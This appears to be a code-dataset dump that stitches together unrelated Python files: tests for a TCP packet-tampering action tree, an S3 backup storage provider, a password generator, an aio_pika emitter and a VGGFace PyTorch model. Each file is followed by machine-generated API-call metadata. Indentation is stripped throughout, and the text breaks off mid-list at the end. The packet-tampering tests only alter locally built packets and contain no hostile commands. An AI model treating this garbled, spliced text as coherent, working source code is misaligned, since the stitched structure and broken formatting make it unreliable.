def test_iter():
"""
Tests iterator.
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
assert a.add_action(tamper)
assert a.add_action(tamper2)
assert not a.add_action(tamper)
for node in a:
print(node)
def test_run():
"""
Tests running packets through the chain.
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
packet = layers.packet.Packet(IP()/TCP())
a.add_action(tamper)
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 1
assert None not in packets
assert packets[0].get("TCP", "flags") == "S"
a.add_action(tamper2)
print(str(a))
packet = layers.packet.Packet(IP()/TCP())
assert not a.add_action(tamper), "tree added duplicate action"
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 1
assert None not in packets
assert packets[0].get("TCP", "flags") == "R"
print(str(a))
a.remove_action(tamper2)
a.remove_action(tamper)
a.add_action(duplicate)
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 2
assert None not in packets
assert packets[0][TCP].flags == "RA"
assert packets[1][TCP].flags == "RA"
print(str(a))
duplicate.left = tamper
duplicate.right = tamper2
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
print("ABUT TO RUN")
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 2
assert None not in packets
print(str(a))
print(str(packets[0]))
print(str(packets[1]))
assert packets[0][TCP].flags == "S"
assert packets[1][TCP].flags == "R"
print(str(a))
tamper.left = duplicate2
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 3
assert None not in packets
assert packets[0][TCP].flags == "S"
assert packets[1][TCP].flags == "S"
assert packets[2][TCP].flags == "R"
print(str(a))
tamper2.left = drop
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 2
assert None not in packets
assert packets[0][TCP].flags == "S"
assert packets[1][TCP].flags == "S"
print(str(a))
assert a.remove_action(duplicate2)
tamper.left = actions.drop.DropAction()
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logger )
assert len(packets) == 0
print(str(a))
a.parse("[TCP:flags:A]-duplicate(tamper{TCP:flags:replace:R}(tamper{TCP:chksum:replace:14239},),duplicate(tamper{TCP:flags:replace:S},))-|", logger)
packet = layers.packet.Packet(IP()/TCP(flags="A"))
assert a.check(packet, logger)
packets = a.run(packet, logger)
assert len(packets) == 3
assert packets[0][TCP].flags == "R"
assert packets[1][TCP].flags == "S"
assert packets[2][TCP].flags == "A"
def test_index():
"""
Tests index
"""
a = actions.tree.ActionTree("out")
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="F")
assert a.add_action(tamper)
assert a[0] == tamper
assert not a[1]
assert a.add_action(tamper2)
assert a[0] == tamper
assert a[1] == tamper2
assert a[-1] == tamper2
assert not a[10]
assert a.add_action(tamper3)
assert a[-1] == tamper3
assert not a[-11]
def test_mate():
"""
Tests mate primitive
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
assert not a.choose_one()
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
other_a = actions.tree.ActionTree("out", trigger=t)
assert not a.mate(other_a), "Can't mate empty trees"
assert a.add_action(tamper)
assert other_a.add_action(tamper2)
assert a.choose_one() == tamper
assert other_a.choose_one() == tamper2
assert a.get_parent(tamper) == (None, None)
assert other_a.get_parent(tamper2) == (None, None)
assert a.add_action(duplicate)
assert a.get_parent(duplicate) == (tamper, "left")
duplicate.right = drop
assert a.get_parent(drop) == (duplicate, "right")
assert other_a.add_action(duplicate2)
# Test mating a full tree with a full tree
assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate(,drop),)-|"
assert str(other_a) == "[TCP:flags:0]-tamper{TCP:flags:replace:R}(duplicate,)-|"
assert a.swap(duplicate, other_a, duplicate2)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate,)-|"
assert str(other_a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:R}(duplicate(,drop),)-|"
assert len(a) == 2
assert len(other_a) == 3
assert duplicate2 not in other_a
assert duplicate not in a
assert tamper.left == duplicate2
assert tamper2.left == duplicate
assert other_a.get_parent(duplicate) == (tamper2, "left")
assert a.get_parent(duplicate2) == (tamper, "left")
assert other_a.get_parent(drop) == (duplicate, "right")
assert a.get_parent(None) == (None, None)
# Test mating two trees with just root nodes
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
assert not a.choose_one()
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
other_a = actions.tree.ActionTree("out", trigger=t)
assert not a.mate(other_a)
assert a.add_action(duplicate)
assert other_a.add_action(duplicate2)
assert a.mate(other_a)
assert a.action_root == duplicate2
assert other_a.action_root == duplicate
assert not duplicate.left and not duplicate.right
assert not duplicate2.left and not duplicate2.right
# Confirm that no nodes have been aliased or connected between the trees
for node in a:
for other_node in other_a:
assert not node.left == other_node
assert not node.right == other_node
# Test mating two trees where one is empty
assert a.remove_action(duplicate2)
# This should swap the duplicate action to be the action root of the other tree
assert str(a) == "[TCP:flags:0]-|"
assert str(other_a) == "[TCP:flags:0]-duplicate-|"
assert a.mate(other_a)
assert not other_a.action_root
assert a.action_root == duplicate
assert len(a) == 1
assert len(other_a) == 0
# Confirm that no nodes have been aliased or connected between the trees
for node in a:
for other_node in other_a:
if other_node:
assert not node.left == other_node
assert not node.right == other_node
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate(,drop),)-|", logger)
drop = a.action_root.left.right
assert str(drop) == "drop"
# Note that this will return a valid ActionTree, but because it is empty,
# it is technically a False-y value, as it's length is 0
assert other_a.parse("[TCP:flags:0]-|", logger) == other_a
a.swap(drop, other_a, None)
assert other_a.action_root == drop
assert not a.action_root.left.right
assert str(other_a) == "[TCP:flags:0]-drop-|"
assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate,)-|"
other_a.swap(drop, a, a.action_root.left)
# Confirm that no nodes have been aliased or connected between the trees
for node in a:
for other_node in other_a:
if other_node:
assert not node.left == other_node
assert not node.right == other_node
assert str(other_a) == "[TCP:flags:0]-duplicate-|"
assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(drop,)-|"
a.parse("[TCP:flags:0]-drop-|", logger)
other_a.parse("[TCP:flags:0]-duplicate(drop,drop)-|", logger)
a_drop = a.action_root
other_duplicate = other_a.action_root
a.swap(a_drop, other_a, other_duplicate)
print(str(a))
print(str(other_a))
assert str(other_a) == "[TCP:flags:0]-drop-|"
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
drop2 = actions.drop.DropAction()
drop3 = actions.drop.DropAction()
a = actions.tree.ActionTree("out", trigger=t)
a.add_action(duplicate)
a.add_action(drop)
a.add_action(drop2)
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
assert a.get_slots() == 0
other_a = actions.tree.ActionTree("out", trigger=t)
other_a.add_action(drop3)
a.swap(drop, other_a, drop3)
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
a.swap(drop3, other_a, drop)
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
assert a.mate(other_a)
def test_choose_one():
"""
Tests choose_one functionality
"""
a = actions.tree.ActionTree("out")
drop = actions.drop.DropAction()
assert not a.choose_one()
assert a.add_action(drop)
assert a.choose_one() == drop
assert a.remove_action(drop)
assert not a.choose_one()
duplicate = actions.duplicate.DuplicateAction()
a.add_action(duplicate)
assert a.choose_one() == duplicate
duplicate.left = drop
assert a.choose_one() in [duplicate, drop]
# Make sure that both actions get chosen
chosen = set()
for i in range(0, 10000):
act = a.choose_one()
chosen.add(act)
assert chosen == set([duplicate, drop])
| [
"logging.getLogger",
"os.path.exists",
"scapy.all.TCP",
"scapy.all.IP",
"os.remove"
] | [((425, 450), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (442, 450), False, 'import logging\n'), ((1143, 1168), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (1160, 1168), False, 'import logging\n'), ((1892, 1917), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (1909, 1917), False, 'import logging\n'), ((2463, 2488), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (2480, 2488), False, 'import logging\n'), ((6251, 6277), 'os.path.exists', 'os.path.exists', (['"""tree.png"""'], {}), "('tree.png')\n", (6265, 6277), False, 'import os\n'), ((6282, 6303), 'os.remove', 'os.remove', (['"""tree.png"""'], {}), "('tree.png')\n", (6291, 6303), False, 'import os\n'), ((6557, 6582), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (6574, 6582), False, 'import logging\n'), ((7228, 7253), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (7245, 7253), False, 'import logging\n'), ((16632, 16657), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (16649, 16657), False, 'import logging\n'), ((20492, 20517), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (20509, 20517), False, 'import logging\n'), ((6410, 6436), 'os.path.exists', 'os.path.exists', (['"""tree.png"""'], {}), "('tree.png')\n", (6424, 6436), False, 'import os\n'), ((8229, 8254), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (8246, 8254), False, 'import logging\n'), ((8562, 8587), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (8579, 8587), False, 'import logging\n'), ((12186, 12211), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (12203, 12211), False, 'import logging\n'), ((13606, 13631), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (13623, 13631), False, 'import logging\n'), ((17195, 17220), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (17212, 17220), False, 'import logging\n'), ((17517, 17542), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (17534, 17542), False, 'import logging\n'), ((17841, 17866), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (17858, 17866), False, 'import logging\n'), ((18196, 18221), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (18213, 18221), False, 'import logging\n'), ((18567, 18592), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (18584, 18592), False, 'import logging\n'), ((18901, 18926), 'logging.getLogger', 'logging.getLogger', (['"""test"""'], {}), "('test')\n", (18918, 18926), False, 'import logging\n'), ((1266, 1270), 'scapy.all.IP', 'IP', ([], {}), '()\n', (1268, 1270), False, 'from scapy.all import IP, TCP\n'), ((1271, 1285), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""A"""'}), "(flags='A')\n", (1274, 1285), False, 'from scapy.all import IP, TCP\n'), ((1350, 1360), 'scapy.all.IP', 'IP', ([], {'ttl': '(64)'}), '(ttl=64)\n', (1352, 1360), False, 'from scapy.all import IP, TCP\n'), ((1361, 1376), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (1364, 1376), False, 'from scapy.all import IP, TCP\n'), ((1688, 1698), 'scapy.all.IP', 'IP', ([], {'ttl': '(15)'}), '(ttl=15)\n', (1690, 1698), False, 'from scapy.all import IP, TCP\n'), ((1699, 1714), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (1702, 1714), False, 'from scapy.all import IP, TCP\n'), ((2017, 2021), 'scapy.all.IP', 'IP', ([], {}), '()\n', (2019, 2021), False, 'from scapy.all import IP, TCP\n'), ((2022, 2036), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""A"""'}), "(flags='A')\n", (2025, 2036), False, 'from scapy.all import IP, TCP\n'), ((2168, 2172), 'scapy.all.IP', 'IP', ([], {}), '()\n', (2170, 2172), False, 'from scapy.all import IP, TCP\n'), ((2173, 2187), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""A"""'}), "(flags='A')\n", (2176, 2187), False, 'from scapy.all import IP, TCP\n'), ((17130, 17134), 'scapy.all.IP', 'IP', ([], {}), '()\n', (17132, 17134), False, 'from scapy.all import IP, TCP\n'), ((17135, 17140), 'scapy.all.TCP', 'TCP', ([], {}), '()\n', (17138, 17140), False, 'from scapy.all import IP, TCP\n'), ((17410, 17414), 'scapy.all.IP', 'IP', ([], {}), '()\n', (17412, 17414), False, 'from scapy.all import IP, TCP\n'), ((17415, 17420), 'scapy.all.TCP', 'TCP', ([], {}), '()\n', (17418, 17420), False, 'from scapy.all import IP, TCP\n'), ((17791, 17795), 'scapy.all.IP', 'IP', ([], {}), '()\n', (17793, 17795), False, 'from scapy.all import IP, TCP\n'), ((17796, 17811), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (17799, 17811), False, 'from scapy.all import IP, TCP\n'), ((18121, 18125), 'scapy.all.IP', 'IP', ([], {}), '()\n', (18123, 18125), False, 'from scapy.all import IP, TCP\n'), ((18126, 18141), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (18129, 18141), False, 'from scapy.all import IP, TCP\n'), ((18517, 18521), 'scapy.all.IP', 'IP', ([], {}), '()\n', (18519, 18521), False, 'from scapy.all import IP, TCP\n'), ((18522, 18537), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (18525, 18537), False, 'from scapy.all import IP, TCP\n'), ((18851, 18855), 'scapy.all.IP', 'IP', ([], {}), '()\n', (18853, 18855), False, 'from scapy.all import IP, TCP\n'), ((18856, 18871), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (18859, 18871), False, 'from scapy.all import IP, TCP\n'), ((19204, 19208), 'scapy.all.IP', 'IP', ([], {}), '()\n', (19206, 19208), False, 'from scapy.all import IP, TCP\n'), ((19209, 19224), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""RA"""'}), "(flags='RA')\n", (19212, 19224), False, 'from scapy.all import IP, TCP\n'), ((19498, 19502), 'scapy.all.IP', 'IP', ([], {}), '()\n', (19500, 19502), False, 'from scapy.all import IP, TCP\n'), ((19503, 19517), 'scapy.all.TCP', 'TCP', ([], {'flags': '"""A"""'}), "(flags='A')\n", (19506, 19517), False, 'from scapy.all import IP, TCP\n')] |
#!/usr/bin/python3
import json
import re
import boto3
import botocore
from . import provider
class S3(provider.Provider):
def __init__(self, access_key_id, bucket, cacert, endpoint, no_ssl_verify, region, secret_access_key, staging_directory):
"""Create a new S3 provider which allows interaction with S3 masked behind the common 'Provider' interface. All
required parameters should be those parsed from the ini.
"""
super().__init__(access_key_id, bucket, cacert, endpoint, no_ssl_verify, region, secret_access_key, staging_directory)
# boto3 will raise an exception if given an empty string as the endpoint_url so we must construct a kwargs
# dictionary and conditionally populate it.
kwargs = {}
if self.access_key_id:
kwargs['aws_access_key_id'] = self.access_key_id
if self.cacert:
kwargs['verify'] = self.cacert
if self.endpoint != '':
kwargs['endpoint_url'] = self.endpoint
if self.no_ssl_verify:
# Supplying no_ssl_verify will override the cacert value if supplied e.g. they are mutually exclusive
kwargs['verify'] = False
if self.region:
kwargs['region_name'] = self.region
if self.secret_access_key:
kwargs['aws_secret_access_key'] = self.secret_access_key
self.resource = boto3.resource('s3', **kwargs)
def schema_prefix(self):
"""See super class"""
return 's3://'
def setup(self):
"""See super class"""
configuration = {}
if self.region:
configuration['LocationConstraint'] = self.region
try:
self.resource.create_bucket(Bucket=self.bucket, CreateBucketConfiguration=configuration)
except botocore.exceptions.ClientError as error:
error_code = error.response['Error']['Code']
if error_code != 'BucketAlreadyExists':
raise error
def teardown(self, info, remote_client):
"""See super class"""
bucket = self.resource.Bucket(self.bucket)
# Delete all the remaining objects
try:
for obj in bucket.objects.all():
obj.delete()
except botocore.exceptions.ClientError as error:
error_code = error.response['Error']['Code']
if error_code == 'NoSuchBucket':
# Some tests remove the bucket after it's created/cleaned, if the bucket doesn't exist then all we need
# to do is clean the staging directory.
self._remove_staging_directory(info, remote_client)
return
raise error_code
# Abort all the remaining multipart uploads. We ignore any 'NoSuchUpload' errors because we don't care if the
# upload doesn't exist; we are trying to remove it.
for upload in bucket.multipart_uploads.all():
try:
upload.abort()
except botocore.exceptions.ClientError as error:
error_code = error.response['Error']['Code']
if error_code != "NoSuchUpload":
raise error
# Remove the staging directory because cbbackupmgr has validation to ensure that are unique to each archive
self._remove_staging_directory(info, remote_client)
def remove_bucket(self):
"""See super class"""
self.resource.Bucket(self.bucket).delete()
def get_json_object(self, key):
"""See super class"""
obj = None
try:
obj = json.loads(self.resource.Object(self.bucket, key).get()['Body'].read())
except botocore.exceptions.ClientError as error:
error_code = error.response['Error']['Code']
if error_code not in ('NoSuchKey', 'KeyNotFound'):
raise error_code
return obj
def list_objects(self, prefix=None):
"""See super class"""
keys = []
kwargs = {}
if prefix:
kwargs['Prefix'] = prefix
for obj in self.resource.Bucket(self.bucket).objects.filter(**kwargs):
keys.append(obj.key)
return keys
def delete_objects(self, prefix):
"""See super class"""
kwargs = {}
if prefix:
kwargs['Prefix'] = prefix
for obj in self.resource.Bucket(self.bucket).objects.filter(**kwargs):
obj.delete()
def list_backups(self, archive, repo):
"""See super class"""
pattern = re.compile("([0-9]+)-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])[Tt]([01][0-9]|2[0-3])_([0-5][0-9])_([0-5][0-9]|60)(\.[0-9]+)?(([Zz])|([\+|\-]([01][0-9]|2[0-3])_[0-5][0-9]))")
backups = []
for obj in self.resource.Bucket(self.bucket).objects.filter(Prefix=f"{archive}/{repo}"):
res = pattern.search(obj.key)
if res and res.group() not in backups:
backups.append(res.group())
return backups
def num_multipart_uploads(self):
return sum(1 for _ in self.resource.Bucket(self.bucket).multipart_uploads.all())
provider.Provider.register(S3)
| [
"boto3.resource",
"re.compile"
] | [((1389, 1419), 'boto3.resource', 'boto3.resource', (['"""s3"""'], {}), "('s3', **kwargs)\n", (1403, 1419), False, 'import boto3\n'), ((4528, 4713), 're.compile', 're.compile', (['"""([0-9]+)-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])[Tt]([01][0-9]|2[0-3])_([0-5][0-9])_([0-5][0-9]|60)(\\\\.[0-9]+)?(([Zz])|([\\\\+|\\\\-]([01][0-9]|2[0-3])_[0-5][0-9]))"""'], {}), "(\n '([0-9]+)-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])[Tt]([01][0-9]|2[0-3])_([0-5][0-9])_([0-5][0-9]|60)(\\\\.[0-9]+)?(([Zz])|([\\\\+|\\\\-]([01][0-9]|2[0-3])_[0-5][0-9]))'\n )\n", (4538, 4713), False, 'import re\n')] |
import random
import string
# Gera um número inteiro entra A e B
# inteiro = random.randint(10, 20)
# Gera um número de ponto flutuante entra A e B
# flutuante = random.uniform(10, 20)
# Gera um número de ponto flutuante entre 0.0 e 1.0
flutuante = random.random()
# Gerar um número aleatório usando a função range()
# de ate pulando de 10
inteiro = random.randrange(900, 1000, 10)
lista = ['Luiz', 'Otávio', 'Maria', 'Rose', 'Jenny', 'Danilo', 'Felipe']
# Seleciona aleatóriamente valores de uma lista
sorteio = random.sample(lista, 2) ##sorteia dois nomes diferentes aleatorios por vez
# sorteio = random.choices(lista, k=2) #sorteia dois nomes aleatorios por vez porem pode repetir o mesmo nome
# sorteio = random.choice(lista) #sorteia um nome na lista
# Embaralha a lista
random.shuffle(lista)# embaralhar a lista
# Gera senha aleatória
letras = string.ascii_letters
digitos = string.digits
caracteres = '!@#$%&*._-'
geral = letras + digitos + caracteres
senha = "".join(random.choices(geral, k=20))
print(senha)
| [
"random.sample",
"random.shuffle",
"random.randrange",
"random.choices",
"random.random"
] | [((252, 267), 'random.random', 'random.random', ([], {}), '()\n', (265, 267), False, 'import random\n'), ((384, 415), 'random.randrange', 'random.randrange', (['(900)', '(1000)', '(10)'], {}), '(900, 1000, 10)\n', (400, 415), False, 'import random\n'), ((551, 574), 'random.sample', 'random.sample', (['lista', '(2)'], {}), '(lista, 2)\n', (564, 574), False, 'import random\n'), ((816, 837), 'random.shuffle', 'random.shuffle', (['lista'], {}), '(lista)\n', (830, 837), False, 'import random\n'), ((1016, 1043), 'random.choices', 'random.choices', (['geral'], {'k': '(20)'}), '(geral, k=20)\n', (1030, 1043), False, 'import random\n')] |
import json
from aio_pika import Message, DeliveryMode, ExchangeType
from lib.ipc.util import poll_for_async_connection
class Emitter:
def __init__(self):
self.connection = None
self.event_exchange = None
async def connect(self, loop):
# Perform connection
self.connection = await poll_for_async_connection(loop)
channel = await self.connection.channel()
self.event_exchange = await channel.declare_exchange(
'events', ExchangeType.TOPIC
)
return self
async def close(self):
await self.connection.close()
async def emit(self, routing_key, body):
message = Message(
json.dumps(body).encode(),
delivery_mode=DeliveryMode.PERSISTENT
)
# Sending the message
await self.event_exchange.publish(
message, routing_key=routing_key
)
| [
"json.dumps",
"lib.ipc.util.poll_for_async_connection"
] | [((325, 356), 'lib.ipc.util.poll_for_async_connection', 'poll_for_async_connection', (['loop'], {}), '(loop)\n', (350, 356), False, 'from lib.ipc.util import poll_for_async_connection\n'), ((695, 711), 'json.dumps', 'json.dumps', (['body'], {}), '(body)\n', (705, 711), False, 'import json\n')] |
# Copyright 2019 Systems & Technology Research, LLC
# Use of this software is governed by the license.txt file.
import os
import numpy as np
import torch
import torch.nn as nn
import torchvision.transforms as transforms
import torch.nn.functional as F
from PIL import ImageFilter
def prepare_vggface_image(img):
"""
Convert an RGB byte image to a FloatTensor suitable for processing with the network.
This function assumes the image has already been resized, cropped, jittered, etc.
"""
# Convert to BGR
img_bgr = np.array(img)[...,[2,1,0]]
# Subtract mean pixel value
img_bgr_fp = img_bgr - np.array((93.5940, 104.7624, 129.1863))
# Permute dimensions so output is 3xRxC
img_bgr_fp = np.rollaxis(img_bgr_fp, 2, 0)
return torch.from_numpy(img_bgr_fp).float()
def generate_random_blur(blur_radius, blur_prob):
def random_blur(img):
if np.random.random() < blur_prob:
return img.filter(ImageFilter.GaussianBlur(radius=blur_radius))
else:
return img
return random_blur
""" Function suitable for transform argument of datasets.ImageFolder """
def vggface_preprocess(jitter=False, blur_radius=None, blur_prob=1.0):
transform_list = [transforms.Resize(256),]
if jitter:
transform_list.append(transforms.RandomCrop((224,224)))
transform_list.append(transforms.RandomHorizontalFlip())
#transform_list.append(transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1))
else:
transform_list.append(transforms.CenterCrop((224,224)))
if blur_radius is not None and blur_prob > 0:
transform_list.append(transforms.Lambda(generate_random_blur(blur_radius, blur_prob)))
# finally, convert PIL RGB image to FloatTensor
transform_list.append(transforms.Lambda(prepare_vggface_image))
return transforms.Compose(transform_list)
class VGGFace(nn.Module):
"""
The VGGFace network (VGG_VD_16)
mode can be one of ['encode', 'classify', 'both']
"""
def __init__(self, mode='encode', num_classes=2622):
super(VGGFace, self).__init__()
valid_modes = {'encode','classify','both'}
if mode not in valid_modes:
raise Exception('mode should be one of ' + str(valid_modes))
self.mode = mode
self.fc_outputs = num_classes
# layers with stored weights
self.conv1_1 = nn.Conv2d(3,64,(3, 3),(1, 1),(1, 1))
self.conv1_2 = nn.Conv2d(64,64,(3, 3),(1, 1),(1, 1))
self.conv2_1 = nn.Conv2d(64,128,(3, 3),(1, 1),(1, 1))
self.conv2_2 = nn.Conv2d(128,128,(3, 3),(1, 1),(1, 1))
self.conv3_1 = nn.Conv2d(128,256,(3, 3),(1, 1),(1, 1))
self.conv3_2 = nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1))
self.conv3_3 = nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1))
self.conv4_1 = nn.Conv2d(256,512,(3, 3),(1, 1),(1, 1))
self.conv4_2 = nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1))
self.conv4_3 = nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1))
self.conv5_1 = nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1))
self.conv5_2 = nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1))
self.conv5_3 = nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1))
self.fc6 = nn.Linear(25088,4096)
self.fc7 = nn.Linear(4096,4096)
self.fc8 = nn.Linear(4096, self.fc_outputs)
# layers with no weights
self.nonlin = nn.ReLU()
self.maxpool = nn.MaxPool2d((2, 2),(2, 2),(0, 0),ceil_mode=True)
self.dropout = nn.Dropout(0.5)
def forward(self, input):
"""
Run the network.
Input should be Nx3x224x224.
Based on self.mode, return output of fc7, fc8, or both.
"""
assert len(input.size()) == 4
e1_1 = self.nonlin(self.conv1_1(input))
e1_2 = self.maxpool(self.nonlin(self.conv1_2(e1_1)))
e2_1 = self.nonlin(self.conv2_1(e1_2))
e2_2 = self.maxpool(self.nonlin(self.conv2_2(e2_1)))
e3_1 = self.nonlin(self.conv3_1(e2_2))
e3_2 = self.nonlin(self.conv3_2(e3_1))
e3_3 = self.maxpool(self.nonlin(self.conv3_3(e3_2)))
e4_1 = self.nonlin(self.conv4_1(e3_3))
e4_2 = self.nonlin(self.conv4_2(e4_1))
e4_3 = self.maxpool(self.nonlin(self.conv4_3(e4_2)))
e5_1 = self.nonlin(self.conv5_1(e4_3))
e5_2 = self.nonlin(self.conv5_2(e5_1))
e5_3 = self.maxpool(self.nonlin(self.conv5_3(e5_2)))
e5_3_flat = e5_3.view(e5_3.size(0), -1)
e6 = self.nonlin(self.fc6(e5_3_flat))
# use encoding prior to nonlinearity
e7_pre = self.fc7(self.dropout(e6))
e7 = self.nonlin(e7_pre)
# return e7, e8, or both depending on self.mode
if self.mode == 'encode':
return e7
else:
e8 = self.fc8(self.dropout(e7))
if self.mode == 'classify':
return e8
elif self.mode == 'both':
return e7,e8
else:
raise Exception('Invalid mode: ' + mode)
def set_fc_outputs(self, new_fc_outputs):
self.fc_outputs = new_fc_outputs
self.fc8 = nn.Linear(4096, self.fc_outputs)
class VGGFace_Custom(VGGFace):
"""Inherit VGGFace() and override the forward pass to
normalize the output. Don't care about classification
"""
def forward(self, input, nrm=True):
"""
Run the network.
Input should be Nx3x224x224.
Based on self.mode, return output of fc7, fc8, or both.
"""
assert len(input.size()) == 4
e1_1 = self.nonlin(self.conv1_1(input))
e1_2 = self.maxpool(self.nonlin(self.conv1_2(e1_1)))
e2_1 = self.nonlin(self.conv2_1(e1_2))
e2_2 = self.maxpool(self.nonlin(self.conv2_2(e2_1)))
e3_1 = self.nonlin(self.conv3_1(e2_2))
e3_2 = self.nonlin(self.conv3_2(e3_1))
e3_3 = self.maxpool(self.nonlin(self.conv3_3(e3_2)))
e4_1 = self.nonlin(self.conv4_1(e3_3))
e4_2 = self.nonlin(self.conv4_2(e4_1))
e4_3 = self.maxpool(self.nonlin(self.conv4_3(e4_2)))
e5_1 = self.nonlin(self.conv5_1(e4_3))
e5_2 = self.nonlin(self.conv5_2(e5_1))
e5_3 = self.maxpool(self.nonlin(self.conv5_3(e5_2)))
e5_3_flat = e5_3.view(e5_3.size(0), -1)
e6 = self.nonlin(self.fc6(e5_3_flat))
# use encoding prior to nonlinearity
e7_pre = self.fc7(self.dropout(e6))
e7 = self.nonlin(e7_pre)
"""Override code here: Want to normalize the output and
return the encoding. Don't care about classification.
"""
if nrm is False:
return e7
#print torch.div(e7,torch.norm(e7))
#print e7.size()
xnorm = F.normalize(e7, p=2, dim=1)
return xnorm
#return torch.div(e7,torch.norm(e7))
def vgg16(model_filename=None):
"""
Constructs a VGG-16 model
"""
model = VGGFace_Custom()
if model_filename is not None:
model.load_state_dict(torch.load(model_filename))
return model
| [
"torchvision.transforms.CenterCrop",
"torch.nn.ReLU",
"torch.nn.Dropout",
"numpy.random.random",
"torch.load",
"numpy.rollaxis",
"torchvision.transforms.Lambda",
"torch.from_numpy",
"torch.nn.Conv2d",
"torch.nn.functional.normalize",
"numpy.array",
"torchvision.transforms.RandomCrop",
